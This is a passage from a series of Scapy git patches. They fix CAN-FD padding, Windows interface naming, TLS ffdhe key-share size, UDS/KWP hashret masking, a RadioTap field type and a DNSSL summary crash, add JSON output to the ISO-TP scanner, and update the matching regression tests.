of sockets that were selected and the function to be called next to get the packets (i.g. recv) """ + ready_sockets = \ + [s for s in sockets if isinstance(s, PythonCANSocket) and + len(s.can_iface.rx_queue)] + # checking the queue length without locking might sound + # dangerous, but for the purpose of this select, if another + # thread is reading the same socket, then even proper locking + # wouldn't help + if not ready_sockets: + # yield this thread to avoid starvation + time.sleep(0) + SocketsPool.multiplex_rx_packets() - return [s for s in sockets if isinstance(s, PythonCANSocket) and - not s.can_iface.rx_queue.empty()] + return cast(List[SuperSocket], ready_sockets) def close(self): # type: () -> None diff --git a/scapy/layers/can.py b/scapy/layers/can.py index 11ec477f75f..36e25c02798 100644 --- a/scapy/layers/can.py +++ b/scapy/layers/can.py @@ -14,10 +14,9 @@ import struct from scapy.compat import Tuple, Optional, Type, List, Union, Callable, IO, \ - Any, cast, hex_bytes + Any, cast, hex_bytes, chb from scapy.config import conf -from scapy.compat import orb from scapy.data import DLT_CAN_SOCKETCAN from scapy.fields import FieldLenField, FlagsField, StrLenField, \ ThreeBytesField, XBitField, ScalingField, ConditionalField, LenField, ShortField @@ -101,11 +100,11 @@ def dispatch_hook(cls, **kargs # type: Any ): # type: (...) -> Type[Packet] if _pkt: - fdf_set = len(_pkt) > 5 and orb(_pkt[5]) & 0x04 and \ - not orb(_pkt[5]) & 0xf8 + fdf_set = len(_pkt) > 5 and _pkt[5] & 0x04 and \ + not _pkt[5] & 0xf8 if fdf_set: return CANFD - elif len(_pkt) > 16: + elif len(_pkt) > 4 and _pkt[4] > 8: return CANFD return CAN @@ -179,6 +178,26 @@ class CANFD(CAN): StrLenField('data', b'', length_from=lambda pkt: int(pkt.length)), ] + def post_build(self, pkt, pay): + # type: (bytes, bytes) -> bytes + + data = super(CANFD, self).post_build(pkt, pay) + + length = data[4] + + if 8 < length <= 24: + wire_length = length + (-length) % 4 + elif 24 < length <= 64: + wire_length = length + (-length) % 8 + elif length > 64: + raise NotImplementedError + else: + wire_length = length + + pad = b"\x00" * (wire_length - length) + + return data[0:4] + chb(wire_length) + data[5:] + pad + bind_layers(CookedLinux, CANFD, proto=13) @@ -588,13 +607,13 @@ def read_packet(self, size=CAN_MTU): if len(line) < 16: raise EOFError - is_log_file_format = orb(line[0]) == orb(b"(") + is_log_file_format = line[0] == ord(b"(") fd_flags = None if is_log_file_format: t_b, intf, f = line.split() if b'##' in f: idn, data = f.split(b'##') - fd_flags = orb(data[0]) + fd_flags = data[0] data = data[1:] else: idn, data = f.split(b'#') diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index 0d489f6fb43..68ee1c99480 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -1,4 +1,5 @@ % Regression tests for gmlanutil +~ scanner + Configuration ~ conf diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 5914b17cdc0..84a46732f1d 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -192,7 +192,8 @@ scanner = executeScannerInVirtualEnvironment( 0x2A, 0x2C, 0x2E, 0x2F, 0x31, 0x34, 0x35, 0x36, 0x37, 0x38, 0x3D, 0x3E, 0x83, 0x84, 0x85, - 0x87]}) + 0x87], + "request_length": 1}) scanner.show_testcases() assert len(scanner.state_paths) == 5 diff --git a/test/contrib/canfdsocket_native.uts b/test/contrib/canfdsocket_native.uts index 1f0ca94d992..ac2ed3ea19e 100644 --- a/test/contrib/canfdsocket_native.uts +++ b/test/contrib/canfdsocket_native.uts @@ -47,10 +47,15 @@ sock2.send(CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08 sock2.close() rx = sock1.recv() -assert rx == CANFD(identifier=0x7ff,length=9,data=b'\x01\x02\x03\x04\x05\x06\x07\x08\xaa') / Padding(b"\x00" * (64 - 9)) +assert rx == CANFD(identifier=0x7ff,length=12,data=b'\x01\x02\x03\x04\x05\x06\x07\x08\xaa\x00\x00\x00') / Padding(b"\x00" * (64 - 12)) rx = sock1.recv() -assert rx == CAN(identifier=0x7ff,length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') - +# different Kernel Versions produce different packets +hexdump(rx) +test = CANFD(identifier=0x7ff, fd_flags=0, length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') / Padding(b"\x00" * (64 - 8)) +hexdump(test) +test2 = CANFD(identifier=0x7ff,fd_flags=4, length=8,data=b'\x01\x02\x03\x04\x05\x06\x07\x08') / Padding(b"\x00" * (64 - 8)) +hexdump(test2) +assert bytes(rx) in [bytes(test), bytes(test2)] = CAN Socket send recv @@ -61,7 +66,7 @@ sock2.send(CANFD(identifier=0x7ff,length=9,data=b'\x01\x02\x03\x04\x05\x06\x07\x sock2.close() rx = sock1.recv() -assert rx == CANFD(identifier=0x7ff,length=9, fd_flags=4, data=b'\x01\x02\x03\x04\x05\x06\x07\x08\xaa') +assert rx == CANFD(identifier=0x7ff,length=12, fd_flags=4, data=b'\x01\x02\x03\x04\x05\x06\x07\x08\xaa\x00\x00\x00') = CAN Socket basecls test @@ -72,7 +77,7 @@ sock2.close() sock1.basecls = Raw rx = sock1.recv() -assert rx.load == bytes(CANFD(identifier=0x7ff, fd_flags=4, length=9,data=b'\x01\x02\x03\x04\x05\x06\x07\x08\xaa' + b'\x00' * (64 - 9))) +assert rx.load == bytes(CANFD(identifier=0x7ff, fd_flags=4, length=12,data=b'\x01\x02\x03\x04\x05\x06\x07\x08\xaa\x00\x00\x00' + b'\x00' * (64 - 12))) = sniff with filtermask 0x1FFFFFFF and inverse filter diff --git a/test/contrib/canfdsocket_python_can.uts b/test/contrib/canfdsocket_python_can.uts index 022a1397bb7..6ae7b526bfa 100644 --- a/test/contrib/canfdsocket_python_can.uts +++ b/test/contrib/canfdsocket_python_can.uts @@ -1,5 +1,5 @@ % Regression tests for the CANSocket -~ vcan_socket linux needs_root +~ vcan_socket linux needs_root not_pypy # More information at http://www.secdev.org/projects/UTscapy/ @@ -47,7 +47,7 @@ def sender(sock, msg): = CAN Packet init canframe = CANFD(identifier=0x7ff,length=10,data=b'\x01\x02\x03\x04\x05\x06\x07\x08ab') -bytes(canframe) == b'\x00\x00\x07\xff\x0a\x04\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08ab' +bytes(canframe) == b'\x00\x00\x07\xff\x0c\x04\x00\x00\x01\x02\x03\x04\x05\x06\x07\x08ab\x00\x00' + Basic Socket Tests() = CAN Socket Init @@ -56,6 +56,7 @@ sock1 = CANSocket(bustype='socketcan', channel='vcan0', fd=True) sock1.close() del sock1 sock1 = None +assert sock1 == None = CAN Socket send recv small packet diff --git a/test/contrib/cansocket_python_can.uts b/test/contrib/cansocket_python_can.uts index 7b684f40863..78fa349d899 100644 --- a/test/contrib/cansocket_python_can.uts +++ b/test/contrib/cansocket_python_can.uts @@ -1,5 +1,5 @@ % Regression tests for the CANSocket -~ vcan_socket linux needs_root +~ vcan_socket linux needs_root not_pypy # More information at http://www.secdev.org/projects/UTscapy/ From 62718e8fdd049489daa26a281b9e7c529952a104 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 9 Apr 2023 18:59:07 +0200 Subject: [PATCH 1010/1632] Fix get_if_list on windows --- scapy/arch/windows/__init__.py | 4 ++-- test/windows.uts | 6 ++++++ 2 files changed, 8 insertions(+), 2 deletions(-) diff --git a/scapy/arch/windows/__init__.py b/scapy/arch/windows/__init__.py index 0676cee6985..808b4fef493 100755 --- a/scapy/arch/windows/__init__.py +++ b/scapy/arch/windows/__init__.py @@ -643,7 +643,7 @@ def load(self, NetworkInterface_Win=NetworkInterface_Win): 'flags': flags } # No KeyError will happen here, as we get it from cache - results[guid] = NetworkInterface_Win(self, data) + results[netw] = NetworkInterface_Win(self, data) return results def reload(self): @@ -969,7 +969,7 @@ def _route_add_loopback(routes=None, # type: Optional[List[Any]] if ifname == conf.loopback_name: conf.ifaces.pop(devname) # Inject interface - conf.ifaces["{0XX00000-X000-0X0X-X00X-00XXXX000XXX}"] = adapter + conf.ifaces[r"\Device\NPF_{0XX00000-X000-0X0X-X00X-00XXXX000XXX}"] = adapter conf.loopback_name = adapter.network_name if isinstance(conf.iface, NetworkInterface): if conf.iface.network_name == conf.loopback_name: diff --git a/test/windows.uts b/test/windows.uts index eb7cedb5f93..ca7f0e300c3 100644 --- a/test/windows.uts +++ b/test/windows.uts @@ -46,6 +46,12 @@ from scapy.arch.windows import pcap_service_status status = pcap_service_status() assert status += test get_if_list + +from scapy.interfaces import get_if_list + +assert all(x.startswith(r"\Device\NPF_") for x in get_if_list()) + = test pcap_service_stop ~ appveyor_only require_gui From a6b9a837388baa84659cd8f3ef48a47fe1741693 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sun, 9 Apr 2023 18:45:33 +0200 Subject: [PATCH 1011/1632] Pass kwargs to WrpcapSink --- scapy/scapypipes.py | 7 ++++--- test/pipetool.uts | 6 +++--- 2 files changed, 7 insertions(+), 6 deletions(-) diff --git a/scapy/scapypipes.py b/scapy/scapypipes.py index 4d61278eca8..f2b7e82747e 100644 --- a/scapy/scapypipes.py +++ b/scapy/scapypipes.py @@ -203,16 +203,17 @@ class WrpcapSink(Sink): This attribute has no effect after calling :py:meth:`PipeEngine.start`. """ - def __init__(self, fname, name=None, linktype=None): - # type: (str, Optional[str], Optional[int]) -> None + def __init__(self, fname, name=None, linktype=None, **kwargs): + # type: (str, Optional[str], Optional[int], **Any) -> None Sink.__init__(self, name=name) self.fname = fname self.f = None # type: Optional[PcapWriter] self.linktype = linktype + self.kwargs = kwargs def start(self): # type: () -> None - self.f = PcapWriter(self.fname, linktype=self.linktype) + self.f = PcapWriter(self.fname, linktype=self.linktype, **self.kwargs) def stop(self): # type: () -> None diff --git a/test/pipetool.uts b/test/pipetool.uts index 7689e52d998..3ce0d7eaf94 100644 --- a/test/pipetool.uts +++ b/test/pipetool.uts @@ -387,19 +387,19 @@ p = PipeEngine() s = RdpcapSource(os.path.join(dname, "t.pcap")) d1 = Drain(name="d1") -c = WrpcapSink(os.path.join(dname, "t2.pcap"), name="c") +c = WrpcapSink(os.path.join(dname, "t2.pcap.gz"), name="c", gz=1) s > d1 > c p.add(s) p.start() p.wait_and_stop() -results = rdpcap(os.path.join(dname, "t2.pcap")) +results = rdpcap(os.path.join(dname, "t2.pcap.gz")) assert raw(results[0]) == raw(req) assert raw(results[1]) == raw(rpy) os.unlink(os.path.join(dname, "t.pcap")) -os.unlink(os.path.join(dname, "t2.pcap")) +os.unlink(os.path.join(dname, "t2.pcap.gz")) = Test InjectSink and Inject3Sink ~ needs_root From 73735d574909d91d936411c5baa50ba05c93f80e Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Sat, 8 Apr 2023 20:21:16 +0200 Subject: [PATCH 1012/1632] Fix ffdhe creation --- scapy/layers/tls/crypto/groups.py | 2 +- test/tls13.uts | 29 +++++++++++++++++++++++++++++ 2 files changed, 30 insertions(+), 1 deletion(-) diff --git a/scapy/layers/tls/crypto/groups.py b/scapy/layers/tls/crypto/groups.py index 2730b8ef985..a644acde10a 100644 --- a/scapy/layers/tls/crypto/groups.py +++ b/scapy/layers/tls/crypto/groups.py @@ -477,7 +477,7 @@ def _tls_named_groups_pubbytes(privkey): if isinstance(privkey, dh.DHPrivateKey): # https://datatracker.ietf.org/doc/html/rfc8446#section-4.2.8.1 pubkey = privkey.public_key() - return int_bytes(pubkey.public_numbers().y, privkey.key_size) + return int_bytes(pubkey.public_numbers().y, privkey.key_size // 8) elif isinstance(privkey, (x25519.X25519PrivateKey, x448.X448PrivateKey)): # https://datatracker.ietf.org/doc/html/rfc8446#section-4.2.8.2 diff --git a/test/tls13.uts b/test/tls13.uts index b2b1bfae558..750ce979a67 100644 --- a/test/tls13.uts +++ b/test/tls13.uts @@ -1183,3 +1183,32 @@ adb0114161069d364cceb ae8dab6c88151f297daea ecfd2e1a598a486e2efc9 561298f8dd5f35 fdc7f00e6cc6fc0f96752 76a9d607686c4d779d4bb 7544fb60c7f3079afbc74 61ed67fd55a78c44d6f8d 4eaf386acc17dea11e37a 09f63da3d059243b35f44 9e891255ac7b4f631509d 7060f """) + += Create TLS_Ext_KeyShare_CH: compute several algorithms + +from scapy.layers.tls.keyexchange_tls13 import TLS_Ext_KeyShare_CH, KeyShareEntry + +# x25519 +ch = TLS_Ext_KeyShare_CH(client_shares=[KeyShareEntry(group="x25519")]) +ch = TLS_Ext_KeyShare_CH(bytes(ch)) + +assert ch.len == 38 +assert ch.client_shares[0].kxlen == 32 +assert len(ch.client_shares[0].key_exchange) == 32 + +# ffdhe2048 +ch = TLS_Ext_KeyShare_CH(client_shares=[KeyShareEntry(group="ffdhe2048")]) +ch = TLS_Ext_KeyShare_CH(bytes(ch)) + +assert ch.len == 262 +assert ch.client_shares[0].kxlen == 256 +assert len(ch.client_shares[0].key_exchange) == 256 + +# secp384r1 +ch = TLS_Ext_KeyShare_CH(client_shares=[KeyShareEntry(group="secp384r1")]) +ch = TLS_Ext_KeyShare_CH(bytes(ch)) + +assert ch.len == 103 +assert ch.client_shares[0].kxlen == 97 +assert len(ch.client_shares[0].key_exchange) == 97 + From a812728f4163cd12523de8b24c7ff622d333963f Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Mon, 27 Mar 2023 11:42:39 +0200 Subject: [PATCH 1013/1632] Fix #3947 --- scapy/contrib/automotive/gm/gmlan.py | 2 +- scapy/contrib/automotive/kwp.py | 2 +- scapy/contrib/automotive/uds.py | 2 +- .../automotive/scanner/uds_scanner.uts | 20 +++++++++++++++++++ 4 files changed, 23 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/automotive/gm/gmlan.py b/scapy/contrib/automotive/gm/gmlan.py index cc185d73ceb..f4a248dce92 100644 --- a/scapy/contrib/automotive/gm/gmlan.py +++ b/scapy/contrib/automotive/gm/gmlan.py @@ -112,7 +112,7 @@ def answers(self, other): def hashret(self): if self.service == 0x7f: - return struct.pack('B', self.requestServiceId) + return struct.pack('B', self.requestServiceId & ~0x40) return struct.pack('B', self.service & ~0x40) diff --git a/scapy/contrib/automotive/kwp.py b/scapy/contrib/automotive/kwp.py index 6220d5c96f9..423f1c94770 100644 --- a/scapy/contrib/automotive/kwp.py +++ b/scapy/contrib/automotive/kwp.py @@ -111,7 +111,7 @@ def answers(self, other): def hashret(self): # type: () -> bytes if self.service == 0x7f: - return struct.pack('B', self.requestServiceId) + return struct.pack('B', self.requestServiceId & ~0x40) else: return struct.pack('B', self.service & ~0x40) diff --git a/scapy/contrib/automotive/uds.py b/scapy/contrib/automotive/uds.py index 6139c8bd66f..e6907018e17 100644 --- a/scapy/contrib/automotive/uds.py +++ b/scapy/contrib/automotive/uds.py @@ -115,7 +115,7 @@ def answers(self, other): def hashret(self): # type: () -> bytes if self.service == 0x7f: - return struct.pack('B', self.requestServiceId) + return struct.pack('B', self.requestServiceId & ~0x40) return struct.pack('B', self.service & ~0x40) diff --git a/test/contrib/automotive/scanner/uds_scanner.uts b/test/contrib/automotive/scanner/uds_scanner.uts index 84a46732f1d..7c72325ba19 100644 --- a/test/contrib/automotive/scanner/uds_scanner.uts +++ b/test/contrib/automotive/scanner/uds_scanner.uts @@ -1071,6 +1071,26 @@ assert 0xff02 in ids assert 0xff03 in ids assert 0xffff in ids += UDS_ServiceEnumerator weird issue + +resps = [EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode=0x13, requestServiceId=0x40)]), + EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId=0x41)]), + EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId=0x11)]), + EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId=0x42)]), + EcuResponse(None, [UDS()/UDS_NR(negativeResponseCode="subFunctionNotSupported", requestServiceId=0x43)])] + +es = [UDS_ServiceEnumerator] + +scanner = executeScannerInVirtualEnvironment( + resps, es, UDS_ServiceEnumerator_kwargs={"scan_range": [0x11, 0x40, 0x41, 0x42]}) + +assert scanner.scan_completed +assert scanner.progress() > 0.95 +tc = scanner.configuration.test_cases[0] +tc.show() + +assert len(tc.results_with_negative_response) == 4 + + Cleanup = Delete testsockets From 2a3a83d2f484274f7fb132e015e7950c3faa330b Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sat, 15 Apr 2023 03:51:07 +0000 Subject: [PATCH 1014/1632] Make repr(RadioTap) with the hemuou_per_user_known field work Looks like it was a typo because FlagsFields expect lists, strings or dicts to be passed to them. Fixes: ``` Traceback (most recent call last): ... File "/home/vagrant/scapy-2/scapy/packet.py", line 563, in __repr__ val = f.i2repr(self, fval) ^^^^^^^^^^^^^^^^^^^^ File "/home/vagrant/scapy-2/scapy/fields.py", line 3082, in i2repr return "None" if x is None else str(self._fixup_val(x)) ^^^^^^^^^^^^^^^^^^^^^^^ File "/home/vagrant/scapy-2/scapy/fields.py", line 2931, in __str__ name = self.names[i] ~~~~~~~~~~^^^ TypeError: 'set' object is not subscriptable ``` It's a follow-up to 76a88dacfcfed7308a316acd14136b5e6fb8ea52 --- scapy/layers/dot11.py | 4 ++-- test/scapy/layers/dot11.uts | 7 ++++++- 2 files changed, 8 insertions(+), 3 deletions(-) diff --git a/scapy/layers/dot11.py b/scapy/layers/dot11.py index cd5d9dd0efc..5eeafa0ed29 100644 --- a/scapy/layers/dot11.py +++ b/scapy/layers/dot11.py @@ -202,7 +202,7 @@ def answers(self, other): 'SGINsysmDis', 'LDPCextraOFDM', 'Beamformed', 'res1', 'res2'] -_rt_hemuother_per_user_known = { +_rt_hemuother_per_user_known = [ 'user field position', 'STA-ID', 'NSTS', @@ -211,7 +211,7 @@ def answers(self, other): 'MCS', 'DCM', 'Coding', -} +] # Radiotap utils diff --git a/test/scapy/layers/dot11.uts b/test/scapy/layers/dot11.uts index a1570e27170..fa0e995d6ee 100644 --- a/test/scapy/layers/dot11.uts +++ b/test/scapy/layers/dot11.uts @@ -554,6 +554,11 @@ assert r.dBm_AntSignal == -30 assert r.Lock_Quality == 100 assert r.RXFlags == 0 +data = b'\x00\x00\x0f\x00\x00\x00\x00\x02\xff\x7f?\x00\x00\x04\x00' +r = RadioTap(data) +repr(r) +assert list(r.hemuou_per_user_known) == ['NSTS'] + = RadioTap - Dissection - guess_payload_class() test data = b'\x00\x00\r\x00\x04\x80\x02\x00\x02\x00\x00\x00\x00@\x00\x00\x00\xff\xff\xff\xff\xff\xff\xe8\x94\xf6\x1c\xdf\x8b\xff\xff\xff\xff\xff\xff\xa0\x01\x00\x10ciscosb-wpa2-eap\x01\x08\x02\x04\x0b\x16\x0c\x12\x18$2\x040H`l\x03\x01\x01-\x1an\x11\x1b\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' radiotap = RadioTap(data) @@ -740,4 +745,4 @@ assert pkt[Dot11EltVHTOperation].ID == 192 assert pkt[Dot11EltVHTOperation].VHT_Operation_Info assert pkt[Dot11EltVHTOperation].VHT_Operation_Info.channel_width == 1 assert pkt[Dot11EltVHTOperation].VHT_Operation_Info.channel_center0 == 42 -assert pkt[Dot11EltVHTOperation].VHT_Operation_Info.channel_center1 == 50 \ No newline at end of file +assert pkt[Dot11EltVHTOperation].VHT_Operation_Info.channel_center1 == 50 From d9b7ebb707e73e2fccdaead168faf35eb5f94cae Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Sun, 16 Apr 2023 08:55:16 +0000 Subject: [PATCH 1015/1632] No longer include DNSSLs in format strings to prevent sprintf from trying to parse them. ICMPv6NDOptRDNSS.mysummary was changed too even though special characters should never get past inet_pton and reach sprintf there. It's a follow-up to f2a137c0388494318662b19f7082b492c7c22fca. Fixes: ``` File "scapy/sendrecv.py", line 1439, in tshark File "scapy/sendrecv.py", line 1311, in sniff File "scapy/sendrecv.py", line 1254, in _run File "scapy/sessions.py", line 109, in on_packet_received File "scapy/sendrecv.py", line 1436, in _cb File "scapy/packet.py", line 1645, in summary File "scapy/packet.py", line 1619, in _do_summary File "scapy/packet.py", line 1619, in _do_summary File "scapy/packet.py", line 1619, in _do_summary [Previous line repeated 2 more times] File "scapy/packet.py", line 1622, in _do_summary File "scapy/layers/inet6.py", line 2052, in mysummary File "scapy/packet.py", line 1530, in sprintf j = fmt[i + 1:].index("}") ^^^^^^^^^^^^^^^^^^^^^^ ValueError: substring not found ``` --- scapy/layers/inet6.py | 4 ++-- test/scapy/layers/inet6.uts | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/scapy/layers/inet6.py b/scapy/layers/inet6.py index 5772ef3a667..67393b78b26 100644 --- a/scapy/layers/inet6.py +++ b/scapy/layers/inet6.py @@ -1972,7 +1972,7 @@ class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet): # RFC 5006 length_from=lambda pkt: 8 * (pkt.len - 1))] def mysummary(self): - return self.sprintf("%name% " + ", ".join(self.dns)) + return self.sprintf("%name% ") + ", ".join(self.dns) class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet): # RFC 5175 (prev. 5075) @@ -2049,7 +2049,7 @@ class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet): # RFC 6106 ] def mysummary(self): - return self.sprintf("%name% " + ", ".join(self.searchlist)) + return self.sprintf("%name% ") + ", ".join(self.searchlist) # End of ICMPv6 Neighbor Discovery Options. diff --git a/test/scapy/layers/inet6.uts b/test/scapy/layers/inet6.uts index c1b7cb8f120..3d358a8f52e 100644 --- a/test/scapy/layers/inet6.uts +++ b/test/scapy/layers/inet6.uts @@ -1198,7 +1198,7 @@ p = ICMPv6NDOptDNSSL(b'\x1f\x02\x00\x00\x00\x00\x00<\x04home\x00\x00\x00') p.type == 31 and p.len == 2 and p.res == 0 and p.lifetime == 60 and p.searchlist == ["home."] = ICMPv6NDOptDNSSL - Summary Output -ICMPv6NDOptDNSSL(searchlist=["home.", "office."]).mysummary() == "ICMPv6 Neighbor Discovery Option - DNS Search List Option home., office." +ICMPv6NDOptDNSSL(searchlist=["home.", "office.", "{"]).mysummary() == "ICMPv6 Neighbor Discovery Option - DNS Search List Option home., office., {" ############ From 62c4bc369a75a45b0484bf43b41d96f30f6ea8f5 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 7 Apr 2023 15:10:45 +0200 Subject: [PATCH 1016/1632] Add JSON output format for isotpscan --- scapy/contrib/isotp/isotp_scanner.py | 53 ++++++++++++++++++++++++++-- test/contrib/isotpscan.uts | 28 +++++++++++++++ 2 files changed, 78 insertions(+), 3 deletions(-) diff --git a/scapy/contrib/isotp/isotp_scanner.py b/scapy/contrib/isotp/isotp_scanner.py index 6edeeb543bc..b21add51a20 100644 --- a/scapy/contrib/isotp/isotp_scanner.py +++ b/scapy/contrib/isotp/isotp_scanner.py @@ -3,7 +3,7 @@ # See https://scapy.net/ for more information # Copyright (C) Nils Weiss # Copyright (C) Alexander Schroeder - +import json # scapy.contrib.description = ISO-TP (ISO 15765-2) Scanner Utility # scapy.contrib.status = library import logging @@ -11,7 +11,7 @@ from threading import Event -from scapy.compat import Iterable, Optional, Union, List, Tuple, Dict +from scapy.compat import Iterable, Optional, Union, List, Tuple, Dict, Any from scapy.packet import Packet from scapy.compat import orb from scapy.layers.can import CAN @@ -20,7 +20,6 @@ from scapy.contrib.isotp.isotp_packet import ISOTPHeader, ISOTPHeaderEA, \ ISOTP_FF, ISOTP - log_isotp = logging.getLogger("scapy.contrib.isotp") @@ -298,6 +297,7 @@ def isotp_scan(sock, # type: SuperSocket - text: human readable output - code: python code for copy&paste + - json: json string - sockets: if output format is not specified, ISOTPSockets will be created and returned in a list @@ -360,6 +360,10 @@ def isotp_scan(sock, # type: SuperSocket return generate_code_output(found_packets, can_interface, extended_addressing) + if output_format == "json": + return generate_json_output(found_packets, can_interface, + extended_addressing) + return generate_isotp_list(found_packets, can_interface or sock, extended_addressing) @@ -454,6 +458,49 @@ def generate_code_output(found_packets, can_interface="iface", return header + result +def generate_json_output(found_packets, # type: Dict[int, Tuple[Packet, int]] + can_interface="iface", # type: Optional[str] + extended_addressing=False # type: bool + ): + # type: (...) -> str + """Generate a list of ISOTPSocket objects from the result of the `scan` or + the `scan_extended` function. + + :param found_packets: result of the `scan` or `scan_extended` function + :param can_interface: description string for a CAN interface to be + used for the creation of the output. + :param extended_addressing: print results from a scan with ISOTP + extended addressing + :return: A list of all found ISOTPSockets + """ + socket_list = [] # type: List[Dict[str, Any]] + for pack in found_packets: + pkt = found_packets[pack][0] + + dest_id = pkt.identifier + pad = True if pkt.length == 8 else False + + if extended_addressing: + source_id = pack >> 8 + source_ext = int(pack - (source_id * 256)) + dest_ext = orb(pkt.data[0]) + socket_list.append({"iface": can_interface, + "tx_id": source_id, + "ext_address": source_ext, + "rx_id": dest_id, + "rx_ext_address": dest_ext, + "padding": pad, + "basecls": ISOTP.__name__}) + else: + source_id = pack + socket_list.append({"iface": can_interface, + "tx_id": source_id, + "rx_id": dest_id, + "padding": pad, + "basecls": ISOTP.__name__}) + return json.dumps(socket_list) + + def generate_isotp_list(found_packets, # type: Dict[int, Tuple[Packet, int]] can_interface, # type: Union[SuperSocket, str] extended_addressing=False # type: bool diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index 733e293fed4..ac88be3ee15 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -214,6 +214,34 @@ s2 = "ISOTPSocket(can0, tx_id=0x603, rx_id=0x703, " \ assert s1 in result assert s2 in result += scan with json output + +sock_sender = TestSocket(CAN) +sock_recv1 = TestSocket(CAN) +sock_sender.pair(sock_recv1) +sock_recv2 = TestSocket(CAN) +sock_sender.pair(sock_recv2) +sock_noise = TestSocket(CAN) +sock_sender.pair(sock_noise) + +with ISOTPSoftSocket(sock_recv1, tx_id=0x702, rx_id=0x602), ISOTPSoftSocket(sock_recv2, tx_id=0x703, rx_id=0x603): + pkt = CAN(identifier=0x701, length=8, data=b'\x01\x02\x03\x04\x05\x06\x07\x08') + make_noise(pkt, 0.01) + result = isotp_scan(sock_sender, range(0x5ff, 0x604 + 1), + output_format="json", + noise_listen_time=0.1, + sniff_time=0.02, + can_interface="can0", + verbose=False) + +s1 = "\"iface\": \"can0\", \"tx_id\": 1538, \"rx_id\": 1794, " \ + "\"padding\": false, \"basecls\": \"ISOTP\"" +s2 = "\"iface\": \"can0\", \"tx_id\": 1539, \"rx_id\": 1795, " \ + "\"padding\": false, \"basecls\": \"ISOTP\"" +print(result) +assert s1 in result +assert s2 in result + = scan with code output noise sock_sender = TestSocket(CAN) From 19f86dd38ec43397e2108207ce5f1e85db2b5989 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Mon, 17 Apr 2023 20:17:10 +0200 Subject: [PATCH 1017/1632] Tests: use conf.ifaces instead of IFACES --- test/linux.uts | 2 +- test/regression.uts | 21 +++++++++++---------- test/scapy/layers/inet6.uts | 6 +++--- test/windows.uts | 9 +++++---- 4 files changed, 20 insertions(+), 18 deletions(-) diff --git a/test/linux.uts b/test/linux.uts index 9a08e5ff145..b6a6fc5712c 100644 --- a/test/linux.uts +++ b/test/linux.uts @@ -113,7 +113,7 @@ assert exit_status == 0 = IPv6 link-local address selection -IFACES._add_fake_iface("scapy0") +conf.ifaces._add_fake_iface("scapy0") from mock import patch conf.route6.routes = [('fe80::', 64, '::', 'scapy0', ['fe80::e039:91ff:fe79:1910'], 256)] diff --git a/test/regression.uts b/test/regression.uts index d9a8ebfe27f..4506bd65db2 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -273,7 +273,7 @@ bytes_hex(get_if_raw_addr(conf.iface)) def get_dummy_interface(): """Returns a dummy network interface""" - IFACES._add_fake_iface("dummy0") + conf.ifaces._add_fake_iface("dummy0") return "dummy0" get_if_raw_addr(get_dummy_interface()) @@ -3298,10 +3298,9 @@ test_netbsd_7_0() import scapy -IFACES._add_fake_iface("enp3s0") -IFACES._add_fake_iface("lo") +conf.ifaces._add_fake_iface("enp3s0") +conf.ifaces._add_fake_iface("lo") -old_routes = conf.route.routes old_iface = conf.iface old_loopback = conf.loopback_name try: @@ -3328,17 +3327,15 @@ try: finally: conf.loopback_name = old_loopback conf.iface = old_iface - conf.route.routes = old_routes - conf.route.invalidate_cache() - IFACES.reload() + conf.route.resync() + conf.ifaces.reload() = Mocked IPv6 routes calls -IFACES._add_fake_iface("enp3s0") -IFACES._add_fake_iface("lo") +conf.ifaces._add_fake_iface("enp3s0") +conf.ifaces._add_fake_iface("lo") -old_routes = conf.route6.routes old_iface = conf.iface old_loopback = conf.loopback_name try: @@ -3367,6 +3364,7 @@ finally: conf.loopback_name = old_loopback conf.iface = old_iface conf.route6.resync() + conf.ifaces.reload() = Find a link-local address when conf.iface does not support IPv6 @@ -3892,6 +3890,9 @@ conf.route.routes = [ assert sorted(conf.route.get_if_bcast(dummy_interface)) == sorted(['169.254.255.255', '172.21.230.255', '239.255.255.255']) conf.route.routes = bck_conf_route_routes += Remove dummy interface + +conf.ifaces.reload() ############ ############ diff --git a/test/scapy/layers/inet6.uts b/test/scapy/layers/inet6.uts index 3d358a8f52e..d140b653779 100644 --- a/test/scapy/layers/inet6.uts +++ b/test/scapy/layers/inet6.uts @@ -1793,9 +1793,9 @@ assert defragment6(pkts).plen == 1508 + Test Route6 class = Fake interfaces 